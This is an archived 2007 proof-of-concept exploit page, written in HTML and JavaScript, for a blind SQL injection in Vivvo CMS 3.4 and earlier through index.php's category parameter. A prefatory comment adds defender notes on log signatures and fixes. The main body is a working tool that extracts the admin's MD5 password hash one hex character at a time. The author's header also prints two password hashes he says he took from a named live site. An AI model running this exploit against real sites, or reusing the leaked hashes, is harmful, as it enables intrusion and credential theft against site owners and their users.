
vivvocms-sql.txt

Posted on 19 July 2007

<!--
  Archived proof-of-concept page for the issue named in its title: a boolean-based
  blind SQL injection through the `category` query parameter of index.php
  (Vivvo CMS <= 3.4, per the title).

  What the page does, as visible below: each button click sends one GET request
  that appends an AND condition to the `category` value. The condition compares the
  ASCII code of a single character of a `password` value from `tblUsers` with one
  candidate code, and the script then looks for a marker span in the response to
  decide whether the condition was true.

  Reviewer notes for defenders:
  - The server-side code is not shown here. The payload shape implies that `category`
    reaches a SQL statement without being bound as a parameter or cast to an integer;
    confirm against the application source. Binding the value (or strict integer
    validation) removes the injection point.
  - The requests are distinctive in web-server and WAF logs: a `category=` value
    containing `/**/AND/**/`, `ascii(substring(`, and
    `SELECT/**/password/**/FROM/**/tblUsers`, ending in an unterminated `/*`.
    Bursts of near-identical requests that differ only in the trailing number are
    the enumeration pattern.
  - The form label below describes the target value as a 32-character MD5 string.
    Unsalted MD5 password storage should be treated as compromised once such a value
    has been read out; rotate credentials and move to a salted, slow password hash.
-->
<html>
<head>
<title>Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit</title>
<script type="text/javascript">
//'===============================================================================================
//'[Script Name: Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit
//'[Coded by : ajann
//'[Author : ajann
//'[Contact : :(
//'[S.Page : http://www.vivvo.net/
//'[$$ : $ 195
//'[Using : Write Target after Submit Click
//'[TR : (author's note, translated from Turkish) * I decided to finally publish this
//'       vulnerability, which I had been holding back for 3 months; you can work out the
//'       method, the exploit is a bit complicated. Also, the md5s of the 1st and 2nd users
//'       that I took from a Turkish site, heykhaber, on which I tried this vulnerability
//'       at the time;
//'       UserID:1 // 473a0029306b7435bed66350a16fcca8
//'       UserId:2 // f4f532fa737f55a4d54bf20c2d70d331 /*
//'===============================================================================================

// Creates the request object used for every probe. Browsers reporting
// "Microsoft Internet Explorer" in navigator.appName get the ActiveX
// XMLHTTP object; everything else gets XMLHttpRequest.
function nesneyarat() {
  var nesne;
  var tarayici = navigator.appName;
  if(tarayici == "Microsoft Internet Explorer"){
    nesne = new ActiveXObject("Microsoft.XMLHTTP");
  } else {
    nesne = new XMLHttpRequest();
  }
  return nesne;
}

// One shared request object, created at load time and reused by islemlink().
var http = nesneyarat();

// Builds the probe URL and sends it as an asynchronous GET.
//   adresyolla: first half of the injected condition (up to the substring position)
//   charyolla:  second half (substring length and the candidate ASCII code)
// The URL is assembled by plain string concatenation, with no URL encoding:
//   <target> + <path> + "/index.php?category=" + <category id>
//            + adresyolla + <character position> + charyolla
// All locals here are assigned without `var`, so they become globals.
function islemlink(adresyolla,charyolla) {
  genreidim=document.getElementById('genreid').value
  file="/index.php?category=" + genreidim
  pathim=document.getElementById('path').value + file
  // The position typed into the "Character" field is placed between the two halves.
  karakterim=document.getElementById('karakter').value + charyolla
  adres=document.getElementById('adresim').value + pathim + adresyolla + karakterim
  http.open('get', adres);
  http.onreadystatechange = cevapFonksiyonu;
  http.send(null);
}

// readystatechange handler: once the response is complete (readyState 4), copies the
// body into the hidden `mesaj` textarea and evaluates it with yonlendir().
function cevapFonksiyonu() {
  if(http.readyState == 4){
    document.getElementById('mesaj').value = http.responseText;
    yonlendir();
  }
}

// The boolean oracle. The response counts as "true" when it contains the marker
// `<span class="plainTxtGray">` and as "false" when it does not; the result is shown
// with alert(). NOTE(review): presumably that span only appears when the category
// query returns rows, which is what makes the injected AND condition observable;
// the page itself does not say so.
function yonlendir() {
  if (document.getElementById('mesaj').value.indexOf('<span class="plainTxtGray">', 0) == -1) {
    alert('False');
  }
  if (document.getElementById('mesaj').value.indexOf('<span class="plainTxtGray">', 0) != -1) {
    alert('TRUEEEEEEE');
  }
}

// Click handler for the submit button. It is a manual state machine keyed on the
// button's current label: every click tests ONE candidate character and then relabels
// the button to the next candidate. The candidate codes are 48-57 ('0'-'9') and
// 97-102 ('a'-'f'), i.e. the lowercase hex alphabet, matching the "[Md5 Character 1-32]"
// label on the form. `userid=1` and the `password` / `tblUsers` names are hard-coded in
// every branch. Each branch disables the button and re-enables it after 2000 ms through
// a string passed to setTimeout. After 'f' the label becomes "Finished", which matches
// no branch, so further clicks do nothing.
function dal() {
  if (document.getElementById('buton').value == "Test Character(0)")
  {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=48)/*');
    document.getElementById('buton').value = "Test Character(1)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(1)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=49)/*');
    document.getElementById('buton').value = "Test Character(2)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(2)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=50)/*');
    document.getElementById('buton').value = "Test Character(3)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(3)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=51)/*');
    document.getElementById('buton').value = "Test Character(4)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(4)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=52)/*');
    document.getElementById('buton').value = "Test Character(5)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(5)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=53)/*');
    document.getElementById('buton').value = "Test Character(6)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(6)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=54)/*');
    document.getElementById('buton').value = "Test Character(7)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(7)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=55)/*');
    document.getElementById('buton').value = "Test Character(8)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(8)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=56)/*');
    document.getElementById('buton').value = "Test Character(9)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(9)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=57)/*');
    document.getElementById('buton').value = "Test Character(a)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(a)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=97)/*');
    document.getElementById('buton').value = "Test Character(b)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(b)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=98)/*');
    document.getElementById('buton').value = "Test Character(c)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(c)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=99)/*');
    document.getElementById('buton').value = "Test Character(d)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(d)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=100)/*');
    document.getElementById('buton').value = "Test Character(e)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(e)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=101)/*');
    document.getElementById('buton').value = "Test Character(f)"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
  if (document.getElementById('buton').value == "Test Character(f)") {
    document.getElementById('buton').disabled = true;
    islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=102)/*');
    document.getElementById('buton').value = "Finished"
    setTimeout("document.getElementById('buton').disabled = false;",2000);
    return false;
  }
}
</script>
</head>
<body bgcolor="#000000">
<center>
<p><b><font face="Verdana" size="2" color="#008000">Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit</font></b></p>
<p></p>
<!-- Operator inputs read by islemlink(): target base URL, script path, character
     position (labelled 1-32) and category id. All four are concatenated into the
     request URL as typed. -->
<b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/</font><font color="#00FF00" size="2" face="Arial"> </font><font color="#FF0000" size="2">&nbsp;</font></b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<input type="text" name="adresim" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="http://"></p>
<br>
<b><font face="Arial" size="1" color="#FF0000">&nbsp;Path:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]&nbsp;&nbsp;&nbsp; </font></b>
<input type="text" name="path" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="/">
<p>
<b><font face="Arial" size="1" color="#FF0000">&nbsp;Character:</font><font face="Arial" size="1" color="#808080">[Md5 Character 1-32]&nbsp;&nbsp; </font></b>
<input type="text" name="karakter" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
<p>
<b><font face="Arial" size="1" color="#FF0000">Category Id:</font><font face="Arial" size="1" color="#808080">[index.php?category=]&nbsp;&nbsp; </font></b>
<input type="text" name="genreid" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
<!-- The button label doubles as the state of dal(): it names the candidate character
     that the next click will test. -->
<p><input type="submit" value="Test Character(0)" name="buton" onclick="dal();"></p>
<br>
<!-- Hidden buffer that receives the raw response body for the marker check in yonlendir(). -->
<textarea name="mesaj" rows="1" cols="20" style="visibility:hidden"></textarea>
<br>
<p>
<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</p>
</center>
</body>
</html>

 
